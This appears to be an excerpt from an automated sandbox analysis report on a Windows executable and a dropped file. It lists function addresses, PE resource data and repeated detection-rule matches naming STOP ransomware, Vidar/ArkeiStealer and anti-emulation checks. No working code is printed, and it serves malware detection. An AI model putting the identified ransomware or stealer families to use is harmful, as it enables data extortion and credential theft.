Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_0042E003	8_2_0042E003
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_0040D240	8_2_0040D240
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_0041E690	8_2_0041E690
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_0040F730	8_2_0040F730
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_00419F90	8_2_00419F90
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_0050D050	8_2_0050D050
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_0040C070	8_2_0040C070
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_0042F010	8_2_0042F010
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_0050D008	8_2_0050D008
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_0050D028	8_2_0050D028
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_0050D090	8_2_0050D090
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_0050D0A8	8_2_0050D0A8
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_00410160	8_2_00410160
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_0044237E	8_2_0044237E
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_0050C4E0	8_2_0050C4E0
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_004344FF	8_2_004344FF
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_00449506	8_2_00449506
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_0043E5A3	8_2_0043E5A3
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_0044B5B1	8_2_0044B5B1
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_0040A660	8_2_0040A660
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_0040274E	8_2_0040274E
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_0040A710	8_2_0040A710
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_0044D7A1	8_2_0044D7A1
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_0042C804	8_2_0042C804
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_0050C960	8_2_0050C960
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_0050C928	8_2_0050C928
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_0044D9DC	8_2_0044D9DC
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_0050C988	8_2_0050C988
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_0050C9A8	8_2_0050C9A8
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_00449A71	8_2_00449A71
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_00443B40	8_2_00443B40
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_0050CB78	8_2_0050CB78
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_0044ACFF	8_2_0044ACFF
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_0040DD40	8_2_0040DD40
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_0050CD60	8_2_0050CD60
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_0040BDC0	8_2_0040BDC0
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_0050CDF0	8_2_0050CDF0
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_0050CE58	8_2_0050CE58
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_0042CE51	8_2_0042CE51
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_00420F30	8_2_00420F30
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_0050CF28	8_2_0050CF28
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_0050CFC0	8_2_0050CFC0
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_00449FE3	8_2_00449FE3
Source: C:\Users\user\Desktop\Q5W0I0pzFI.exe	Code function: 8_2_0050CF90	8_2_0050CF90

Source: Q5W0I0pzFI.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Q5W0I0pzFI.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: build2[1].exe.8.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: build2[1].exe.8.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: Q5W0I0pzFI.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: 8.0.Q5W0I0pzFI.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 8.0.Q5W0I0pzFI.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 7.2.Q5W0I0pzFI.exe.22115a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 7.2.Q5W0I0pzFI.exe.22115a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 14.2.build2.exe.21615a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 14.2.build2.exe.21615a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Vidar author = ditekSHen, description = Detects Vidar / ArkeiStealer
Source: 11.2.Q5W0I0pzFI.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 11.2.Q5W0I0pzFI.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 11.0.Q5W0I0pzFI.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 11.0.Q5W0I0pzFI.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 10.2.Q5W0I0pzFI.exe.22f15a0.1.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 10.2.Q5W0I0pzFI.exe.22f15a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.2.Q5W0I0pzFI.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 8.2.Q5W0I0pzFI.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 2.0.Q5W0I0pzFI.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 2.0.Q5W0I0pzFI.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 16.0.build2.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 16.0.build2.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Vidar author = ditekSHen, description = Detects Vidar / ArkeiStealer
Source: 11.0.Q5W0I0pzFI.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 11.0.Q5W0I0pzFI.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 11.0.Q5W0I0pzFI.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 11.0.Q5W0I0pzFI.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 14.2.build2.exe.21615a0.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 14.2.build2.exe.21615a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Vidar author = ditekSHen, description = Detects Vidar / ArkeiStealer
Source: 2.0.Q5W0I0pzFI.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 2.0.Q5W0I0pzFI.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 11.0.Q5W0I0pzFI.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 11.0.Q5W0I0pzFI.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 2.0.Q5W0I0pzFI.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 2.0.Q5W0I0pzFI.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.0.Q5W0I0pzFI.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 8.0.Q5W0I0pzFI.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.Q5W0I0pzFI.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 9.0.Q5W0I0pzFI.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 16.0.build2.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 16.0.build2.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Vidar author = ditekSHen, description = Detects Vidar / ArkeiStealer
Source: 8.0.Q5W0I0pzFI.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 8.0.Q5W0I0pzFI.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0.2.Q5W0I0pzFI.exe.21d15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 0.2.Q5W0I0pzFI.exe.21d15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.Q5W0I0pzFI.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 9.0.Q5W0I0pzFI.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 2.0.Q5W0I0pzFI.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 2.0.Q5W0I0pzFI.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.2.Q5W0I0pzFI.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 9.2.Q5W0I0pzFI.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.0.Q5W0I0pzFI.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 8.0.Q5W0I0pzFI.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 11.0.Q5W0I0pzFI.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 11.0.Q5W0I0pzFI.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.0.Q5W0I0pzFI.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 8.0.Q5W0I0pzFI.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 11.0.Q5W0I0pzFI.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 11.0.Q5W0I0pzFI.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.0.Q5W0I0pzFI.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 17.0.Q5W0I0pzFI.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 2.0.Q5W0I0pzFI.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 2.0.Q5W0I0pzFI.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 2.0.Q5W0I0pzFI.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 2.0.Q5W0I0pzFI.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.Q5W0I0pzFI.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 9.0.Q5W0I0pzFI.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.2.Q5W0I0pzFI.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 9.2.Q5W0I0pzFI.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.0.Q5W0I0pzFI.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 17.0.Q5W0I0pzFI.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.Q5W0I0pzFI.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 9.0.Q5W0I0pzFI.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.0.Q5W0I0pzFI.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 17.0.Q5W0I0pzFI.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.0.Q5W0I0pzFI.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 8.0.Q5W0I0pzFI.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 15.2.Q5W0I0pzFI.exe.22215a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 15.2.Q5W0I0pzFI.exe.22215a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 11.2.Q5W0I0pzFI.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 11.2.Q5W0I0pzFI.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.Q5W0I0pzFI.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 9.0.Q5W0I0pzFI.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 16.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 16.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Vidar author = ditekSHen, description = Detects Vidar / ArkeiStealer
Source: 9.0.Q5W0I0pzFI.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 9.0.Q5W0I0pzFI.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 16.0.build2.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 16.0.build2.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Vidar author = ditekSHen, description = Detects Vidar / ArkeiStealer
Source: 11.0.Q5W0I0pzFI.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 11.0.Q5W0I0pzFI.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 2.0.Q5W0I0pzFI.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 2.0.Q5W0I0pzFI.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 11.0.Q5W0I0pzFI.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 11.0.Q5W0I0pzFI.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 16.0.build2.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 16.0.build2.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Vidar author = ditekSHen, description = Detects Vidar / ArkeiStealer
